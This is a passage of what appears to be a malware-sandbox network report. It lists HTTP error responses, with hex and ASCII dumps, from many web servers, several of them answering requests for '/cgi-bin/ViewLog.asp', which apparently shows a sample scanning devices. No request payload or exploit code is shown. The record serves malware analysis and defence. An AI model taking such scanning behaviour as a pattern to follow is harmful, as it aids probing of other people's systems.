20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Sun, 23 Oct 2022 17:58:11 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:12 GMTServer: Apache/2.2.9 (Debian) DAV/2 PHP/5.2.6-1+lenny13 with Suhosin-PatchVary: Accept-EncodingContent-Encoding: gzipContent-Length: 268Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 50 5d 6b c3 30 0c 7c cf af d0 fa b4 31 62 25 59 f7 05 26 d0 35 2d 2d a4 9d d9 d2 c1 1e dd 5a c3 81 cc c9 6c 67 5d ff fd 9c 94 c1 10 08 4e a7 3b 71 e2 17 c5 f3 bc 7a 17 0b 58 55 9b 12 c4 ee a9 5c cf 61 12 23 ae 17 d5 12 b1 a8 8a 33 93 b1 04 71 b1 9d e4 11 d7 fe b3 c9 b9 26 a9 02 f0 b5 6f 28 9f 26 53 d8 b6 1e 96 6d 6f 14 c7 f3 30 e2 38 2e f1 7d ab 4e 83 2e cd ff ed 04 14 f1 2e af 34 81 a5 af 9e 9c 27 05 bb 97 12 b0 36 8a 7e 58 a7 3b 38 4a 07 26 48 3e 06 09 b4 06 bc ae 1d 38 b2 df 64 19 c7 6e 30 b5 a1 49 a5 2c 39 97 cf 3a 79 d0 84 19 cb d8 23 5c 16 b4 af a5 b9 82 62 f6 86 19 88 95 c0 db 40 dc c5 e9 75 43 c6 9c d2 1b 38 d6 5e c3 6b af 5b 57 9b 58 48 7f 08 68 34 07 e9 21 cd ee 59 12 2a 05 d1 5a 0f 0f 09 c7 bf 3b 21 d9 98 29 a4 18 7e 11 fd 02 11 0e 92 e7 46 01 00 00 Data Ascii: MP]k0|1b%Y&5--Zlg]N;qzXU\a#3q&o(&Smo08.}N..4'6~X;8J&H>8dn0I,9:y#\b@uC8^k[WXHh4!Y*Z;!)~F
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:13 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 38 3a 31 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 70 70 73 30 31 2e 6e 65 66 6b 6f 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:58:13 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 309Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:13 GMTServer: Apache/2.4.10 (Debian)Content-Length: 292Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 38 3a 31 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6c 63 6d 61 73 74 65 72 2e 63 6c 69 63 6b 69 74 2e 6c 6f 63 61 6c 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:58:13 GMTServer: Apache/2.4.10 (Debian)Content
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:58:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 19 9a e8 19 28 68 84 26 95 e6 95 94 6a 22 ab d5 07 d9 06 32 5d 1f ea 52 00 98 e9 56 70 b2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 8d(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU(h&j"2]RVp0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:58:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:51:55 GMTServer: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/8.1.11 mod_fcgid/2.3.10-devContent-Length: 338Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 39 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 62 20 50 48 50 2f 38 2e 31 2e 31 31 20 6d 6f 64 5f 66 63 67 69 64 2f 32 2e 33 2e 31 30 2d 64 65 76 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 31 3a 35 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 39 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 62 20 50 48 50 2f 38 2e 31 2e 31 31 20 6d 6f 64 5f 66 63 67 69 64 2f 32 2e 33 2e 31 30 2d 64 65 76 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 34 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 39 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 62 20 50 48 50 2f 38 2e 31 2e 31 31 20 6d 6f 64 5f 66 63 67 69 64 2f 32 2e 33 2e 31 30 2d 64 65 76 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:58:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveStrict-Transport-Security: max-age=63072000; includeSubDomainsContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:16 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 2.0 CDATA corp 2017.Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=utf-8Cache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 27 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 42 4f 44 59 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML> <HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>404 Not Found</H2>The requested URL '/cgi-bin/ViewLog.asp' was not found on this server. </BODY> </HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 11:39:54 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0Connection: closeAuthInfo:
